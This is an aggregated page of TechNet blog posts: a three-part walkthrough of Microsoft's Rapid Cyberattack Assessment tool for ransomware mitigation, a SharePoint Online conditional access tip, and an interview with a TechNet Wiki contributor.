First, let’s download the tool itself.

It’s a free download from Microsoft, located here:

https://www.microsoft.com/en-us/download/details.aspx?id=56034

It’s important to download both the executable (RCA.exe) and the requirements document. The requirements document is also important, because if you don’t set up the tool correctly as well as the target machines, you likely won’t get some information that’s very valuable.

Conditions

First of all, you need to be aware that the Rapid Cyberattack Assessment tool runs in an Active Directory environment, and against Windows machines only. Any machines that you target with the tool must be part of an Active Directory domain. Additionally, the tool is limited in scope to 500 machines.

What should you do if your environment is larger than that?

There are really two simple options:

  1. Assess your entire environment in 500 machine chunks. Run the tool against a specific OU or group of OU’s that total no more than 500 machines. You can also just create lists (maybe exported from a spreadsheet) and use that as input for the tool. This method will definitely take a little bit of time and it won’t give you a single, comprehensive report view, either.
  2. Take sample machines from a number of different departments and run the tool against them. With this method, you would take (as an example) 50 machines from HR, 50 machines from Finance, 50 machines from Sales, etc…and run the tool against them. It doesn’t capture data on every single machine in the environment, but the tool is designed to give you an idea of where your exposures lie, and that would most likely be revealed in even a random sampling of machines. You can reasonably assume that any vulnerabilities identified in that subset of machines likely exists elsewhere in the environment as well.

Personally, if I was running the tool in my own environment and we had more than 500 machines, I would choose the second option. It gives me a rough idea of the issues I have to resolve and helps me prioritize them. If my environment has more than 500 machines, I’m probably managing them with some sort of automation tool anyway (like System Center Configuration Manager), so I don’t have to know exactly how each machine is configured. I’ll just define what the standard should be and push out that configuration.

Hardware and Software

Installing the Rapid Cyberattack Assessment tool itself isn’t hard at all. You simply run the RCA.exe executable. There aren’t any options or choices to make other than agreeing to the license terms. Likewise, the machine you run the tool from doesn’t have a lot of requirements. It should be:

  1. Server-class or high-end workstation running Windows 7/8/10 or Windows Server 2008 R2/2012/2012 R2/2016.
  2. It’s preferable to have a machine with 16 GB+ of RAM, a 2 GHz+ processor and at least 5 GB disk space.
  3. The machine should be joined to the Active Directory domain you will be assessing.
  4. Microsoft .NET Framework 4.0 must be installed
  5. Optionally, you may want Word, PowerPoint and Excel installed to view the reports. But you can also just export the reports and view them on a machine that has Office installed already.

Account Rights

The service account you use to run the tool needs to be a domain user who has local administrator permissions to all the machines within the scope of the assessment. The account should also have read access to the Active Directory forest that the in-scope computers are joined to.

Network Access

The machines you are trying to assess obviously must be reachable by the assessing machine. Therefore, there must be unrestricted access from the tools machine to any of the in-scope domain joined machines. By “unrestricted access” we mean you should make sure there are no firewall rules or router ACLs that would block access to any of the following protocols and services:

  • Remote Registry
  • Windows Management Instrumentation (WMI)
  • Default admin shares (C$, D$, IPC$)

If you are using Windows Advanced Firewall on the in-scope machines, you may need to adjust the firewall to allow the assessment tool to run.

You can configure this using a Group Policy targeted at the in-scope machines. To do this, follow these steps.

  1. Use an existing Group Policy object or create a new one using the Group Policy Management Tool.
  2. Expand the Computer Configuration/Policies/Windows Settings/Security Settings/Windows Firewall with Advanced Security/Windows Firewall with Advanced Security/Inbound Rules
  3. Check the Predefined:radio button and select Windows Management Instrumentation from the drop-down list. Click 
  4. Check the WMI rules for the Domain Profile. Click Next
  5. Check the Allow the Connectionradio button and click Finish to exit and save the new rule.
  6. Make sure the Group Policy Object is applied to the relevant computers using the Group Policy Management Tool

You would then do the same thing for: Allow file and Print sharing exceptions

For the Remote Registry Service, you want to set the service to Automatic startup for the duration of the assessment.

  1. Open the Group Policy editor and the GPO you want to edit.
  2. Expand Computer Configuration > Policies > Windows Settings > Security Settings > System Services
  3. Find the Remote Registry item and change the Service startup mode to Automatic
  4. Reboot the clients to apply the policy

That should be enough to get you started.

In the next post, I’ll walk you through the survey questions in the Rapid Cyberattack Assessment tool.

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-2/

I think you’ll find the stories revealed by the questions to be quite interesting.

Every Question Tells a Story – Mitigating Ransomware Using the Rapid Cyberattack Assessment Tool: Part 2

$
0
0

In my previous post, I explained how to prepare your environment to run the Rapid Cyberattack Assessment tool, and I told you that the questions in the tool would tell you a story.

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-1/

So, let’s get started with the storytelling, shall we?

Survey Mode or Full Assessment?

Once you start the tool, you are asked if you want to run the tool in Survey Only mode, or in the Full mode.

What’s the difference?

 

  • Survey mode simply asks a set of questions that relate to your environment and then provide you with some guidance on what you should look at to start protecting against ransomware.
  • Full mode includes the survey questions, but it also runs a technical assessment against the machines in your environment to identify specific vulnerabilities.

Thus, survey mode is much quicker – but provides you with less information about the actual machine sin your environment.

This is the mode we will use for the tool.

The next page just outlines the requirements for running the tool, which we discussed previously.

 

Now comes the fun part…the questions.

 

 

The Story-Telling Questions

The first question relates to patching.

 

Question:

“How long does it take to deploy critical security updates to all (99%+) Windows operating systems?”

Why do we ask?

When Petya hit in the summer of 2017, some of the worst-hit organizations were those who had failed to apply one patch to their Windows operating systems. The “Eternal Blue” exploit, which takes advantage of how SMBv1 handles specific types of messages, had been patched three months before Petya made headlines.

(https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2017/ms17-010)

If organizations had applied the patches to their systems within 30 days, it's possible that they could have eliminated their exposure to that exploit.

------------------------------------------------------------

 

 

Question:

How long does it take to deploy critical security updates to all (99%+) deployed software (operating systems, applications, middleware, routers/switches/devices, etc.)?

Why do we ask?

Petya didn’t specifically leverage a weakness in, for example, a switch’s operating system. But it should go without saying that any vulnerability that exists on ANY piece of networking equipment or application or middleware is a weakness in the overall chain. If, for example, an adversary can compromise a switch and gain administrative control over all the traffic flowing between machines, they would then potentially have the ability to capture passwords and other critical information, which then allows them to make their next move.

---------------------------------------------

 

 

Question:

What strategy do you use to mitigate risk of Windows operating systems that cannot be updated and patched?

Why do we ask?

Unfortunately, some of the organizations that were most severely compromised by Petya/NotPetya/WannaCry had been running versions of Windows that have LONG been unsupported. There may genuinely be reasons why they haven’t been updated. Perhaps they are running software from a third-party that has not been tested against newer operating system versions. Maybe the third-party software vendor went out of business and no suitable replacement has been found. Regardless of the reason why the legacy operating systems exist, the key thing that needs to be addressed is “how do we reduce the risk of keeping these systems around?”. If they cannot be upgraded, can they be isolated on a network that isn’t connected to the Internet, and that separates them from the production network? Remember, if one machine can be compromised, it presents a potential threat to every machine on the network.

 

----------------------------------------------------------

 

Now the questions start to get a bit more complex….

Question:

What is your strategy on staying current with technology?

Why do we ask?

This question is really asking, “Are you taking advantage of every improvement in security – whether in the cloud, in Microsoft products, on MacOS, the various flavors of Linux, mobile devices, etc.?

It’s probably safe to say that most of the major software and hardware vendors do their level best to improve the security posture of their products with every new release - whether it’s adding facial recognition, or stronger encryption, or even just addressing vulnerabilities that found their way into previous versions of code. If your user base is running primarily on Windows 7 or *gasp* Windows XP, there are, without any question, vulnerabilities that they are exposed to. Windows XP has, of course, reached its end-of-life, so any exploits identified for Windows XP are no longer being patched by Microsoft. That means these vulnerabilities will exist on your network for as long as those machines exist on your network.

That's a little scary.

The same is true of mobile devices, Mac OS, Linux machines, and so on. Unless they are updated, they will continue to be targeted by the bad guys using common, well-known exploits.

Don’t gamble with your network.

Stay current to the extent that you can do so.

-------------------------------------------------------

 

Question:

Which of the following is true about your disaster recovery program?

Why do we ask?

This is an interesting question. I’ve worked with a couple hundred Microsoft customers over the years, and it’s always interesting to hear exactly how each customer defines their disaster recovery strategy. Most customers have a regular backup process that backs up critical services and applications every day, or every couple hours. Most of those customers probably ship their backup tapes to an offsite tape storage facility for safekeeping in the event of a disaster. Many organizations will say they regularly validate the backups – when what they might mean is “I was able to restore Bob’s Excel file from two weeks ago, so I know the backup tapes are good.” Many organizations also perform some form of highly controlled DR testing yearly or quarterly.

But when you think about what Petya did, are those measures adequate? Imagine every one of your machines completely inoperable. You can recall all the backup tapes you’ve ever created, but your BACKUP SERVER is encrypted by ransomware. Now what? And even if it wasn’t, you can’t authenticate to anything because your domain controllers are encrypted. You can’t even perform name resolution because your DNS servers are encrypted. You could try to send an email from Office 365, but if you have ADFS set up, the authentication for Office 365 is happening on-premises…. against the domain controllers….which are encrypted by ransomware. This is the situation that some organizations faced.

Very few customers who were hit by Petya were prepared for a scenario where EVERYTHING was inoperable, all at the same time. Many were relegated to communicating via text message and WhatsApp because every other communication channel was inaccessible.

------------------------------------------------------

 

Question:

Which of the following measures have you implemented to mitigate against credential theft attacks?

Why do we ask?

Here’s the sad truth about Petya. There were organizations that had 97% (or more) of their workstations patched against the Eternal Blue exploit that we talked about earlier. But Petya didn’t just use one attack vector. Even if only one of the machines on a network of 5,000 machines was unpatched – that was enough of a wedge for Petya to gain a foothold. The next thing it did was attempt to laterally traverse from machine to machine using the local administrator credentials it was able to harvest from the unpatched machine. It would then attempt to use those credentials to connect to all the other machines on its subnet. So even if those machines were patched, if the administrator passwords were the same on those machines, those machines were toast.

Now think about that. How many organizations use a single administrator account and password on every desktop/laptop on the network? Based on what I’ve seen – it’s probably a sizable number. So even if those IT admins are very conscientious about patching, if they use the same local administrator password on every machine, a compromise of one machine is effectively a compromise of ALL the machines.

But how do you manage different passwords on thousands of different machines on a network?

We’ll discuss this quandary in a moment.

------------------------------------------------------

 

Question:

Which of the following measures have you implemented to protect privileged accounts and credentials?

Why do we ask?

It should be obvious that protecting your high-value credentials is important, but let’s talk about the measures you can choose from in the list:

  1. Create separate accounts for privileged activities (vs. standard accounts for email/browsing, etc.): Many organizations have learned this lesson and are good about creating separate sets of credentials for administrative activities and a lower-privileged account for everyday IT worker stuff like checking email, creating documents and surfing the web.
  2. Enforce multi-factor authentication on all privileged accounts: I’m happy to say I’m seeing many more organizations using multifactor authentication for highly-privileged accounts, whether it’s a token, or a phone-based tool like Microsoft Authenticator, or whatever. This is great to see, and I encourage every organization to start looking into MFA. In fact, Office 365 and Azure have MFA capabilities built right in – you just need to turn them on.
  3. All privileged users are prevented from using email and browsing the internet: The key word here is I would venture to say that most organizations advise their admins not to use their admin accounts for browsing the web or checking email. But what if you are fixing a problem with a server and Microsoft has a hotfix that you need to download. Can’t you just this once…..? The answer is “no”.  Admin accounts should be prevented from browsing the internet. Period. Nothing good can come of browsing the wild and wooly internet with an admin account. It’s like walking in a seedy part of the city at night with $100 bills hanging out of your pocket.
  4. Restrict Tier 0 privileged accounts to only logon on Tier 0 servers and trusted workstations (such as PAWs): This is one of the most critical parts of securing administrative access. A core principle for securing administrative access is understanding that if admin A is logged into Workstation A, and he then makes an RDP connection to Server B, then the workstation is a “security dependency” of the server. Put simply, the security of Server B depends upon the security of Workstation A.

 

 

If administrative credentials can be harvested from Workstation A due to lax security controls (for example, using pass-the-hash or pass-the-ticket techniques) then the security of Server B is jeopardized. Therefore, controlling privileged access requires that Workstation A be at the same security level as the machines it is administering. Microsoft’s Privileged Access Workstation (PAWs) guidance can help you understand how to accomplish this.

Microsoft IT enforces the use of Privileged Access Workstations extensively to manage our own privileged assets.

Take the time to read more about Privileged Access Workstations here: http://aka.ms/cyberpaw

-------------------------------------------

 

Question:

Which of the following risk mitigation measures have you implemented to protect Tier 0 assets (Domain Controllers, Domain Administrators) in your environment?

Why do we ask?

The concept of “standing administrative privilege” is one that carries a significant element of risk today. It’s a much better practice to leverage “Just In Time” privileges. This means that the administrator requests, and is granted, the access they need AT THE TIME THEY NEED IT. When the task they are performing is complete, the privilege is revoked. When they need the privilege again, they need to request the access again. This is also good for auditing purposes.

A corollary to this idea is “Just Enough Admin” access. In this scenario, an admin is given THE LEVEL OF PERMISSIONS THAT THEY NEED, AND NO MORE. In other words, if you need to perform DNS management tasks on a Windows server, do you NEED Domain Administrator credentials? No, there is a DNS Administrator RBAC group that can be leveraged to grant someone the needed level of permissions.

Combine “Just Enough Admin” with “Just-In-Time” access, and you significantly reduce the chance of administrative credentials being exposed on your network.

More info here:

https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-practices/implementing-least-privilege-administrative-models

---------------------------------------------------------

 

Question:

Which of the following is true with regards to your partners, vendors and outsources?

Why do we ask?

This is related to one of the more fascinating aspects of the Petya attack.

MeDoc is a company based in Ukraine that makes financial accounting software used by many business and organizations in Ukraine. The Petya attack began when a threat actor compromised the MeDoc application and inserted the Petya ransomware payload into one of the update packages. When the MeDoc customers received their next update, they also received the Petya ransomware. From there, Petya started looking for machines that were vulnerable to the Eternal Blue exploit. Once it found a vulnerable machine, it began attempting the lateral traversal attacks using local administrator privileges that we talked about earlier.

You see how the whole picture is starting to come together? Every question tells a story!

The point behind this question is this: in today’s world, it isn’t enough to simply consider your own security controls and processes. You also must consider the security practices of the vendors and partners you’re doing business with and understand how THEY react to attacks or compromises, because their threats could very well be your threats someday.

-----------------------------------------------------------

 

Question:

Which measures do you have deployed to protect your environment from malware?

Why do we ask?

Any IT admin worth their paycheck has for years been fighting the good fight against things like malware and spam.

But there’s a little more to the question than simply asking if you have an anti-spam and anti-malware component to your network management strategy. The question is also asking “how well does your anti-malware solution protect against the more sophisticated attacks?”

Consider this: from the time that no machines were infected by Petya to the time that tens of thousands of machines were infected by Petya was only about 3 ½ HOURS. That is simply not enough time for an antivirus vendor to reverse engineer the malware, develop a signature, and get it pushed down to their customers. The only real way an antimalware solution can be effective at that scale is if it gets telemetry from millions of endpoints, can detect anomalies using machine learning within SECONDS and take action to block across the world.

For an account of how Windows Defender did exactly that against the DoFoil crypto mining malware, read this story:

https://cloudblogs.microsoft.com/microsoftsecure/2018/03/07/behavior-monitoring-combined-with-machine-learning-spoils-a-massive-dofoil-coin-mining-campaign/

---------------------------------------------------------

 

Question:

Which of the following legacy protocols have you disabled support for in the enterprise?

Why do we ask?

As mentioned earlier in this article, the Petya attack exploited a vulnerability in the SMB V1 protocol that was nicknamed Eternal Blue. SMB (also known as CIFS) is a protocol designed to allow shared access to files, printers and other types of communication between machines on a Windows network.

However, SMB v1, as well as LanMan and NTLM v1 authentication have vulnerabilities that make them potential security risks.

Remember, any protocol that isn’t being used should be disabled or removed. If a protocol is still being used and cannot be removed, at the very least, you need to ensure it is patched when needed.

Learn how to detect use of SMB and remove it from your Windows network here:

https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and

--------------------------------------------------------

 

 

Question:

How do you manage risk from excessive permissions to unstructured data (files on file shares, SharePoint, etc..)?

Why do we ask?

Indeed, why does having knowledge of the permissions on a file share have anything to do with a ransomware attack? Again, there’s a key word here: excessive permissions.

For example, one very common mistake is to assign permissions to the “Everyone” group on a file share. The problem, as you no doubt are aware, is that the Everyone group does not simply mean “everyone in my company”. For that purpose, the “Authenticated Users” group is what you are likely thinking of, since that includes anyone who has logged in with a username and password. However, the Everyone group includes Authenticated Users – but it also includes any user in non-password protected groups such as Guest or Local Service. That’s a MUCH broader group of user accounts, and its possible that some of those accounts are being exploited by people who may be trying to do bad things to your network.

The more people or services there are that have permissions on your network, the greater the chances that one of them will inadvertently (or intentionally) do something bad. It’s all about reducing your risk.

Therefore, a best practice is to perform an audit of your file shares and remove any excessive permissions. This is a good practice to perform anyway, since users change roles and may have permissions to things that they no longer need (such as if an HR person moves into a Marketing role).

---------------

 

Well, that's a lot of questions, huh?

In my final post, I'll show you the last couple steps in using the tool and then walk through the findings.

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-3/

 

Every Question Tells a Story – Mitigating Ransomware Using the Rapid Cyberattack Assessment Tool: Part 3

$
0
0

In the previous two posts in this series, I explained how to prepare your environment to run the Rapid Cyberattack Assessment tool, and I told you the stories behind the questions in the tool.

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-1/

https://blogs.technet.microsoft.com/cloudyhappypeople/2018/09/10/every-question-tells-a-story-mitigating-ransomware-using-the-rapid-cyberattack-assessment-tool-part-2/

Let’s finish up with the final steps in running the Rapid Cyberattack Assessment tool and a review of the output.

Specifying Your Environment

We’ve now finished all the survey questions in the assessment. Now we need to tell the tool which machines to go out and assess as the technical part of the assessment.

There are three ways to accomplish this:

Server Name: You can enter all the names of the machines you want to assess manually in the box, separated by commas, as shown below. This is only practical if you are assessing less than 10 machines. If you’re assessing more than that, I’d recommend that you use one of the other methods or you’ll get really tired of typing.

 

 

File Import: Let’s say you want to assess 10 machines from 10 different departments. You could easily do this by putting all the machine names into a standard text file, adding one machine per line.

In the screenshot below, I have a set of machines in the file named INSCOPE.TXT, located in a folder named C:RCA. This is a good way to run the assessment if the machines are spread across several OU’s in Active Directory, which would make the LDAP path method less viable as a way of targeting machines. But again, it could be a lot of typing (unless you do an export from Active Directory – then it’s super easy).

 

 

LDAP Path: If you have a specific OU in Active Directory that you want to target, or if you have less than 500 machines in your entire Active Directory and just want to target all of them, the easiest way to do that would be with the LDAP path method. Simply type the LDAP path to the target OU, or to the root of your Active Directory, as shown in the screenshot below:

 

NOTE:You only define your "in-scope" machines using ONE of the options noted above.

Click Next and run the assessment.

 

As you see, the assessment goes out and collects data about the machines in the environment, and then it generates a set of reports for you to review.

 

 

Click on View Reports to see the results of the assessment.

Notice that there are four files created. In my screenshot, you’ll also notice that the files don’t have the “official” Office icons – they just look like text files. This is because I don’t have Office installed on the Azure VM that is running the assessment. I can just copy the machines to a machine with Office installed and open them from there. But as you see, there are two Excel spreadsheets, a Word document and a PowerPoint deck. These are all created and populated automatically by the tool.

 

 

Let’s take a look at the tool’s findings.

Rapid Cyberattack Assessment Affected Nodes spreadsheet

First, let’s open the RapidCyberattackAssessmentAffectedNodes.xlsx spreadsheet.

In this spreadsheet you have several tabs along the bottom. The first tab is named “Host”, and it shows the names of the machines it was able to contact during the assessment, their operating system build version, install date and last boot-up time. All pretty standard stuff.

 

The second tab is for “Installed Products", and this is a comprehensive listing of all the installed software found on the machines in the assessment. This is one way of verifying the question in the survey about whether you are keeping all your apps and middleware up to date. As you can see in my screenshot, there’s some software running on my lab machines that is several versions old, and the spreadsheet tells me which machine that software is running on. This is all stuff that could easily be collected by a network management tool like System Center Config Manager, but not every company has that kind of tool, so we provide this summary.

 

The third tab is the "Legacy Computer Summary", which tells you how many of the machines in the assessment are running operating systems that are no longer supported by Microsoft. In my case, I had none. The Active Count and the Stale Count columns simply tell you whether the machine is being logged on to regularly or if perhaps it is simply a stale object in Active Directory and can just be deleted.

 

 

The "Legacy Computer Details" tab would give you more information about those legacy computers and could potentially help you determine what they are being used for.

The "Domain Computer Summary" tab is a summary of how many machines on your network are running current operating system versions.

Rapid Cyberattack Assessment Key Recommendations document

Now let’s go to the Rapid Cyberattack Assessment Key Recommendations Word document.

 

As you can see, this is a nice, professional looking document with an extensive amount of detail that will help you prioritize your next steps. One of the first things we show you is your overall risk scorecard, with your risk broken down into four major categories. In my case, I’ve got some serious issues to work on.

 

 

But then we start helping you figure out how to approach the problems. We show you which of your issues are most urgent and that require your attention within the next 30 days. Then we show you the mid-term projects (30+ days), and finally Additional Mitigation Projects that may take a more extended period of time, or that don’t have a set completion date (such as ensuring that the security of your partners and vendors meets your security requirements). By giving you this breakdown, a list of tasks that could seem overwhelming (such as what you see in my environment below) is somewhat more manageable.

 

 

We then get more granular and give you a listing of the individual issues in the Individual Issue Summary.

You’ll notice that each finding is a hyperlink to another location in the document, which provides you with a status on the issue, a description of the issue, it’s potential impact and (for some of the issues) which specific machines are impacted by the issue.

This is essentially the comprehensive list of all the things that should be addressed on your network.

So how do you track the progress on this?

Excel Resubmission Report spreadsheet

That’s the job of the Excel Resubmission Report.xlsx file. This file is what you would use to track your progress on resolving the issues that have been identified. In this spreadsheet you have tabs for “Active Issues” (things that require attention), “Resolved Issues (things you’ve already remediated) and “Not Applicable Issues” (things that don’t apply to your environment).

 

This spreadsheet is a good way for a project manager to see at a high level what progress has been made on certain issues and where more manpower or budget may need to be allocated.

Rapid CyberAttack Assessment Management Presentation PowerPoint deck

This is the deck – only a few short slides – that provides a high-level executive summary of all the things you identified and how you intend to approach their resolution. This is a very simple deck to prepare and can be used as a project status update deck as well.

 

Every Question Tells a Story

So that’s the Rapid Cyberattack Assessment tool in its entirety. It isn’t necessarily the right tool for a huge Fortune 100 company to use to perform a security audit; there are much more comprehensive tools available (and they usually are quite expensive, which this tool is NOT).

But for the small-medium sized businesses who simply want to understand their exposure to ransomware and take some practical steps to mitigate that exposure, this tool is a great starting point.

SPO Tidbit – Getting to know conditional access and SharePoint

$
0
0

Hello All,

The cloud has forced us to rethink security as corporate boundaries have changed, no longer is it good enough to build just firewalls to protect your data you need to look at how to protect data that is not part of your network.

In O365 to help you reach this goal we have setup Conditional Access which is managed thru Intune, but if your access needs are not extensive you might be able to use SPO Conditional Access without Intune and that is what we will take a look at right now…

Location based: 

This policy can help prevent data leaks and can help meet regulations to prevent access from untrusted networks. You can limit access to specific network ranges from the SPO Admin console. Once configured, any user who attempts to access SharePoint and OneDrive for Business from outside the defined network boundary will be blocked.

Default policy is disabled and no restrictions will be enforced till you configure it.

If you have also configured AAD Premium to restrict location access by IP network range, the AADP whitelist is interpreted first, followed by the SharePoint policy. As result, a you may choose to apply a policy which is more restrictive than in AADP. However, you cannot enable access to an IP address range that is also prohibited by AADP.

 Users will see the following message

 

 

NOTE: You need to be careful that your network ranges include the IP address of your current machine. IP address ranges are strictly enforced, so entering a range that doesn’t include your machine will lock out the admin session.  If this happens you will have to work with support to resolve the issue.  As well this restriction will prevent the sync service from working when outside trusted network but will not prevent synched data from traveling outside the trusted networks, if data is that sensitive consider disabling the sync service in the SPO admin console.

Device based:

Device-based policies allow you to allow or block access or challenge users with Multi-Factor Authentication, device enrollment, or password change.  Policies for SharePoint Online and OneDrive for Business help you ensure data on corporate resources is not leaked onto unmanaged devices such as non-domain joined or non-compliant devices by limiting access to content to the browser, preventing files from being taken offline or synchronized with OneDrive for Business on unmanaged devices.

NOTE: default files that can’t be viewed online (such as zip files) can be downloaded.  If you want to prevent download of these files onto unmanaged devices you can opt-in to block download of files that can’t be viewed on the web.  This will result in a read-only experience for the end users and customizations maybe affected.  

Site-Scoped:

Conditional access is an investment to address the ever-changing security landscape and business needs by introducing new levels of granularity with Site-Scoped Device-based policies for SharePoint and OneDrive to help you ensure data on corporate resources is not leaked onto unmanaged devices such as non-domain joined or non-compliant devices by limiting access to content to the browser, preventing files from being taken offline or synchronized with OneDrive on unmanaged devices at either the Tenant or site collection level.

Can be configured via PowerShell using SPO Management Shell

Connect-SPOService -Url <URL to your SPO admin center>

$Site = Get-SPOSite -Identity <Url to SPO Site Collection>

Set-SPOSite -Identity $Site.Url -ConditionalAccessPolicy AllowLimitedAccess

              NOTE: The Tenant-level device-based policy must be configured to Full Access prior to configuring site-scoped policies.

Pax

Interview with TechNet Ninja – Ramakrishnan Raman

$
0
0

Banner Created by Ousama El Hor

Meet the people behind the scenes!

The TechNet Wiki (TNWiki) Ninjas are the members who write the articles and share their knowledge with the community. Each week we interview one of the top TechNet Wiki Ninjas, who have impressed us. We write about their achievements and introduce them to the community, in our "Monday - Interview with a Wiki Ninja".

Today, I would like to introduce you Ramakrishnan Raman.

Ramakrishnan registered with MSDN in 2013 and in 2018. Since then, his activities in the community have flourished. The graph of his activity during the last year rises up and seems like only the sky is the limit.

Ramakrishnan joined the TNWiki group on Facebook on February 2018. He helps people in the MSDN/TN SharePoint forums and he is active in many community discussions, which help to shape the future of the community.

 

Let’s meet Ramakrishnan!


Ramakrishnan Raman

Here are some of Ramakrishnan’s Statistics:

  • Total of 878 Points, with 703 of these in 2018
  • Wrote 6 TNWiki articles, which won a Gold medals

You can meet Ramakrishnan on Facebooklinkedin, or Twitter.

Well, it’s time to hear from Ramakrishnan…

 


Who are you, where are you, and what do you do? What are your specialty technologies? Also tell more about your interests?

Hello Everyone, My name is Ramakrishnan Raman, I am currently based in NOIDA (India).

My family hails from Southern part of India(Suchindrum, Kanyakumari).

I did my schooling in Capital of India, DELHI and completed my graduation in B.Tech Information Technology from Chennai (India). I started my career in 2011 at Cognizant Technology solutions(CTS), Chennai which provided me an excellent platform to work on Microsoft Product – SharePoint. Later in 2014, I moved to Tata Consultancy Services(TCS), Chennai where I continued to gather knowledge in SharePoint / DotNet Platform which encouraged me to learn more about SharePoint Solutioning/Architecture. I joined HCL Technologies, NOIDA in 2016 and currently working as Technical Lead. The reason for this shift was to be with my parents, as I wanted to spend some quality time of my life with them.

To tell more about my personal interest, I love to be fit & healthy. So, I workout regularly & associate myself to outdoor sports like football, cricket.


Me with my parents, pic taken specifically for this interview, as we didn’t have a recent family photo.

What is TechNet Wiki for? Who is it for?

Well according to me, TechNet Wiki is a portal that provides an appropriate way to share & gain knowledge based on your interest in Microsoft Products/Programming Languages. TechNet wiki is for those who has the urge to share knowledge that they have gained, it is also for the fellow members who search solutions for their business/interest and hence get benefited.

What do you do with TechNet Wiki, and how does that fit into the rest of your job and activities?

For me, TechNet Wiki and my job have a mutual relationship. The solution provided to clients at work by me are published as an article in TechNet. On the other hand (to meet a business requirement) I refer to TechNet Wiki.
To be more precise, TechNet Wiki has provided me recognition & encouragement from my team at workplace as well as from the TechNet community which has now become a driving factor to contribute more.


Picture taken during my visit to Switzerland to meet my sister(in Photo)

What is it about TechNet Wiki that interests you?

The foremost thing of TechNet Wiki that interests me is that we get quality content contributed from gurus across the world and is shared across in the most presentable format for everyone. It is a gateway which acts as a medium to publish an article in the easiest way. These articles are easily accessible through search via Google/Bing due to the tags associated with them. Furthermore, the Wiki gives us an option to edit any articles by anyone. So the articles published are kept up to date and relevant. Last but not the least, when we write an article, we learn the concept ourselves, along the way.

What are your favorite Wiki articles you’ve contributed and what are your top 5 favorite Wiki articles in general?

My favorite articles contributed by me

Top 5 favorite articles in the Wiki

Do you have any tips for new Wiki authors?

Yes, my tips for new wiki authors would be to publish articles which are;

  • Based on today’s trend.
  • Easily readable & understandable
  • Based on their domain well versed in.

Over half a year there are discussions regarding the future of the TechNet Wiki. We are standing on a cross road, and the decisions that will be made in the next few months will shape the future of the community.

How do you see the future of the TechNet Wiki in five, ten, or fifty years from now?

50 years will be too long to predict, but for the next 5 to 10 years, I see a steady growth in the community with quality content. I have also heard that there is a migration planned for the TechNet portal which I believe will bring a fresh look to the community portal.

This is your direct communication channel to the Microsoft team that in-charge on the TNWiki. Is there anything you want me to tell them?

If there is a migration planned, I would suggest the new portal be responsive(mobile friendly), so that people can read articles on the go with ease.

Do you want to add something in conclusion?

Even though I have come a long way with SharePoint solutions, I still consider myself as a novice in the field of development. There is always something new to learn in today’s world. Also, I believe in working hard and keep patience, which my parents have always taught me.

I would personally like to thank you for inviting me for this interview and also for guiding me to improve the presentation of my articles. Especially stressing on the importance of conclusion in the articles. Also, I would like to thank the TechNet community (Judges and Members) who has encouraged & appreciated me and my work.

Once again thank you for giving me this opportunity to express myself.


A view from my ancestral house at my native - Suchindrum


 

Thank you Ramakrishnan. It was our pleasure to hear more about the person behind the scene and to meet the real you.

It was great to hear from you directly, and nice to know more about you.

Thanks for your contributions to the community!

 

Please join me in thanking Ramakrishnan!


 

Note! The banner at the top of the post was created by Ousama El Hor. The signature which I use, includes the icon created by Floris van der Ploeg. You can read more about our yearly contest for banners and logo here.

Viewing all 36188 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>